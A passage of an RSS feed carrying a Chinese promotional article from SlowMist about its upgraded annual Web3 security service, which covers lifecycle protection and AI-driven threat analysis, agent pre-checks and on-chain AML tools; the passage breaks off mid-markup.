data-croporisrc="https://mmbiz.qpic.cn/sz_mmbiz_jpg/zmwON8smU6p0P9ZkIUs7y4DCicz0ysdfYiczcEkhUS5EnWcDfAe9RPiafS1nEpq94w8iahbrD1qI4qovkT3Wng4uknqBicPXiaFPK3JS5WUSK6Qw0/0?wx_fmt=jpeg&amp;from=appmsg" data-cropselx2="546" data-cropsely2="231" data-imgfileid="100020919" src="https://wechat2rss.xlab.app/img-proxy/?k=b02c6c7b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FzmwON8smU6p0P9ZkIUs7y4DCicz0ysdfYiczcEkhUS5EnWcDfAe9RPiafS1nEpq94w8iahbrD1qI4qovkT3Wng4uknqBicPXiaFPK3JS5WUSK6Qw0%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></span></a></p><p style="margin-right: 16px;margin-bottom: 0px;margin-left: 16px;color: rgb(53, 53, 53);letter-spacing: 0.544px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;background-color: rgb(255, 255, 255);font-size: medium;line-height: 1.75em;text-align: center;pointer-events: initial;"><span style="color: rgb(85, 148, 45);"><strong style="font-size: 12px;letter-spacing: 0.544px;pointer-events: initial;"><span leaf="">优质的推送带来深刻的思考</span></strong></span></p><p style="margin-right: 16px;margin-bottom: 0px;margin-left: 16px;color: rgb(53, 53, 53);letter-spacing: 0.544px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;background-color: rgb(255, 255, 255);font-size: medium;line-height: 1.75em;text-align: center;pointer-events: initial;"><span style="color: rgb(85, 148, 45);"><strong><span leaf="" style="color: rgb(85, 148, 45);font-size: 12px;letter-spacing: 0.544px;pointer-events: initial;">给 Odaily 标星，</span></strong><strong><span leaf="" style="color: rgb(85, 148, 45);font-size: 12px;letter-spacing: 0.544px;pointer-events: initial;">让你先与众不同</span></strong></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://www.odaily.news/zh-CN/post/5210000">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=849b5817&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU4ODQ3NTM2OA%3D%3D%26mid%3D2247504594%26idx%3D1%26sn%3D88d0a2ea27ea5f4bd87967e3411848f6">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 30 Mar 2026 18:52:00 +0800</pubDate>
    </item>
    <item>
      <title>慢雾：Web3 安全年框服务全面升级</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504592&amp;idx=1&amp;sn=5b14e6284530b087155c3c9b13b86e3c</link>
      <description>我们希望成为客户在安全能力建设路上长期的同路人。</description>
      <content:encoded><![CDATA[<p><span>慢雾安全团队</span> <span>2026-03-27 18:05</span> <span style="display: inline-block;">中国香港</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=e2a2417d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F8z8bibAexaCItCBjpx99uXUp4UHnOKUsibKficK4Ig1icrZX6icX9pibT3Q6Dtib6bhfNQF3keicveKXgibh79dmiaQyu9kpTnot0c3jjA25xp3oceH2o%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>我们希望成为客户在安全能力建设路上长期的同路人。</p>
  <p><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><p style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf=""><span textstyle="" style="font-size: 24px;font-weight: bold;">背景</span></span></p><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在 Web3 的世界里，安全从来不是一个可以被打勾完成的“任务”，而是一场没有终点的马拉松。但过去很长一段时间，行业对“安全”的理解，依然停留在一次性审计的旧范式之中——通过某个时间点的代码检查，换取上线前的“确定性”。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">然而，随着跨协议组合攻击、闪电贷套利、私钥泄露以及前端劫持等威胁持续演化，这种“快照式安全”正在迅速失效。特别是在 AI Agent 从“辅助工具”进化为“自动执行者”之后，攻击面进一步扩展至提示词注入、恶意 Skills / MCPs 供应链投毒等全新维度，安全风险开始呈现出更强的动态性与联动性。在这样的背景下，安全能力本身也必须完成一次升级。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">基于多年一线攻防实战经验，以及对 AI × Web3 安全趋势的持续洞察，慢雾(SlowMist) 对原有的 Web3 安全年框服务进行了系统性重构与全面升级——</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">从一次性保障，升级为覆盖全生命周期的持续性安全能力。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">本次升级后的 Web3 安全年框服务，不再是传统意义上的年度服务打包，而是一套围绕“持续防护与动态进化”构建的安全伙伴体系，能够在项目从设计、上线到长期运营的每一个阶段，提供可落地、可演进的安全支撑。</span></span></p><b style="font-weight:normal;" data-pm-slice="0 0 []"><h2 dir="ltr" style="line-height: 1.38;background-color: rgb(255, 255, 255);margin-top: 20pt;margin-bottom: 0pt;padding: 0pt 0pt 6pt;"><span leaf="" style="white-space: pre-wrap;font-size: 20pt;font-family: Roboto, sans-serif;color: rgb(6, 10, 38);background-color: transparent;font-weight: 700;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 24px;color: rgb(0, 0, 0);">本次升级的核心变化</span></span></h2><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">相较于传统年框服务，本次升级重点体现在三个方面：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">服务形态升级</span></span><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：从固定周期交付，升级为按需动态调度的持续性安全服务</span></span></p></li></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">能力结构升级</span></span><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">从以单点审计为核心，升级为面向客户定制化需求的全生命周期安全服务体系</span></span></p></li></ul><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">技术驱动升级</span></span><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">：全面引入 AI 能力，实现威胁识别、风险判断与响应处置的智能化提升</span></span></p></li></ul><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这意味着，安全不再是某个阶段的“动作”，而成为贯穿项目全周期的“能力”。</span></span></p></b></b></b><b data-pm-slice="0 0 []"><h2 dir="ltr" style="line-height: 1.38;background-color: rgb(255, 255, 255);margin-top: 20pt;margin-bottom: 0pt;padding: 0pt 0pt 6pt;"><span leaf="" style="white-space: pre-wrap;font-size: 20pt;font-family: Roboto, sans-serif;color: rgb(6, 10, 38);background-color: transparent;font-weight: 700;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 24px;color: rgb(0, 0, 0);">从模板化服务 → 定制化安全伙伴能力</span></span></h2></b></b></p><p><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">没有两个项目是完全相同的。无论是去中心化借贷协议、Layer 2 公链，还是深度集成 AI Agent 的创新应用，其技术架构、资产结构与风险敞口皆存在显著差异。传统的标准化服务难以覆盖复杂多变的真实风险场景。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在升级后的服务体系中，慢雾(SlowMist) 将以“安全伙伴”的角色深度参与项目发展。在服务启动前，我们将与项目方进行系统性对齐，全面梳理业务架构、核心资产路径与安全基线，并据此制定专属的安全策略与执行方案。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">👉 典型的定制化场景包括但不限于：</span></span></p></b><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1.0237388724035608" data-s="300,640" data-type="png" data-w="1348" type="block" data-imgfileid="100020937" src="https://wechat2rss.xlab.app/img-proxy/?k=4ae3781b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCI96C6lWp1E3LxbcBspBDFfibMo2D34ydLjjIytZa3AI7M2B99678xuRYhia88BqfavBTaZicxbOglDaegcGRWrSZm6ymASabibibFs%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><ul class="list-paddingleft-1"></ul></b></p><p><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><span style="white-space:pre-wrap;font-size:17pt;font-family:Roboto,sans-serif;color:#060a26;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><span textstyle="" style="font-weight: bold;">从单点防护 → 全生命周期安全闭环</span></span></span></b><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">升级后的 Web3 安全年框服务，延续并强化了“全生命周期防护”的核心理念，通过“事前 · 事中 · 事后”的闭环体系，构建持续有效的安全屏障。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">♦️ </span></span><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">事前 · 筑牢安全底座</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在设计阶段，协助项目建立安全治理框架与 SOP，制定安全编码规范与发布流程，引入代码冻结机制，并构建多签权限体系（如 Safe 等方案），在源头降低系统性风险。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">♦️ </span></span><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">事中 · 动态进化安全体系</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在业务运行过程中，持续验证安全策略的有效性，并结合实际攻击态势与业务变化不断迭代优化。通过每周威胁情报推送与 0-day 漏洞预警机制，为项目提供持续的风险感知能力。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">♦️ </span></span><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">事后 · 应急响应与复盘重建</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">在黑天鹅事件发生时，提供快速响应与止损支持，协助进行攻击路径分析与根因定位，输出完整复盘报告，并在修复后复核安全上线流程，确保系统恢复后的长期稳健运行。</span></span></p></b></b></p><p style="line-height: 1.38;background-color: rgb(255, 255, 255);margin-top: 20pt;margin-bottom: 0pt;padding: 0pt 0pt 6pt;"><b data-pm-slice="0 0 []"><span leaf="" style="white-space: pre-wrap;font-size: 20pt;font-family: Roboto, sans-serif;color: rgb(6, 10, 38);background-color: transparent;font-weight: 700;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 24px;color: rgb(0, 0, 0);">以安全守护 AI &amp; Crypto，以 AI 赋能安全</span></span></b></p><p><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">作为本次升级的重要组成部分，慢雾(SlowMist) 将 AI 能力全面融入安全体系之中，构建“安全 + AI”的双轮驱动模式：</span></span></p><ul class="list-paddingleft-1"><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">MistAgent · AI 深度安全分析：作为安全生态的 AI 分析中枢，对 Agent 访问目标、外部文件与智能合约进行多维威胁分析与上下文研判，实现从“行为识别”到“威胁定性”的深度闭环。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">MistEye · AI 驱动的实时威胁感知：充当 AI Agent 的“实时威胁视网膜”，在执行前对 URL、域名、开源仓库及 Skills/MCPs 进行安全预检，命中高风险情报时自动触发阻断或升级人工确认。</span></span></p></li><li><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;" role="presentation"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">MistTrack · AI 赋能的链上风控：提供专业的链上 AML 风险分析，支持地址风险评分、资金关联判断与交易前风控校验，自动完成从“行为逻辑审查”到“资金流向监测”的安全闭环。</span></span></p></li></ul><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">我们坚信：「安全能力的构建，必须从单纯的外部工具层，升级为 Agent 内在的默认核心能力。」</span></span></p></b></b></p><p><b style="font-weight:normal;" data-pm-slice="0 0 []"><h2 dir="ltr" style="line-height: 1.38;background-color: rgb(255, 255, 255);margin-top: 20pt;margin-bottom: 0pt;padding: 0pt 0pt 6pt;"><span leaf="" style="white-space: pre-wrap;font-size: 20pt;font-family: Roboto, sans-serif;color: rgb(6, 10, 38);background-color: transparent;font-weight: 700;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 24px;color: rgb(0, 0, 0);">服务形式与适用对象</span></span></h2><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">升级后的服务以年度安全战略伙伴的形式呈现，包含基础服务包与灵活扩展包。支持根据项目进度动态分配资源，或兑换为慢雾旗下安全审计、MistEye、MistTrack 及事件响应等产品与服务。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">适用项目类型广泛，包括但不限于：DeFi 协议、Layer 1 / L2 公链、稳定币协议、跨链桥、NFT 平台、链上游戏、Web3 钱包、RWA 项目、DAO 组织、AI Agent 项目及 AI × Web3 创新应用。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">此外，年框客户还可按需接入慢雾(SlowMist) 安全生态核心产品，并享受专属免费权益：每周精选推送、突发 0-day 实时预警、链上/链下组件漏洞情报及行业安全事件同步。</span></span></p></b><p dir="ltr" style="line-height: 1.38;background-color: rgb(255, 255, 255);margin-top: 20pt;margin-bottom: 0pt;padding: 0pt 0pt 6pt;"><b data-pm-slice="0 0 []"><span leaf="" style="white-space: pre-wrap;font-size: 20pt;font-family: Roboto, sans-serif;color: rgb(6, 10, 38);background-color: transparent;font-weight: 700;font-style: normal;font-variant: normal;text-decoration: none;vertical-align: baseline;"><span textstyle="" style="font-size: 24px;color: rgb(0, 0, 0);">为何选择慢雾？</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">慢雾科技(SlowMist) 成立于 2018 年，历经八载风雨，已在全球建立五大安全基地，为来自多个国家和地区的上千家客户提供专业服务。作为全球最具影响力的区块链安全团队之一，我们凭借长期在一线协助项目方应对真实攻击的实战经验，逐步沉淀出一套覆盖“威胁发现、分析、防御与响应”的一体化安全能力体系。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b style="font-weight:normal;" data-pm-slice="0 0 []"><span leaf="" style="font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;dir&#34;:&#34;ltr&#34;,&#34;style&#34;:&#34;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-weight: 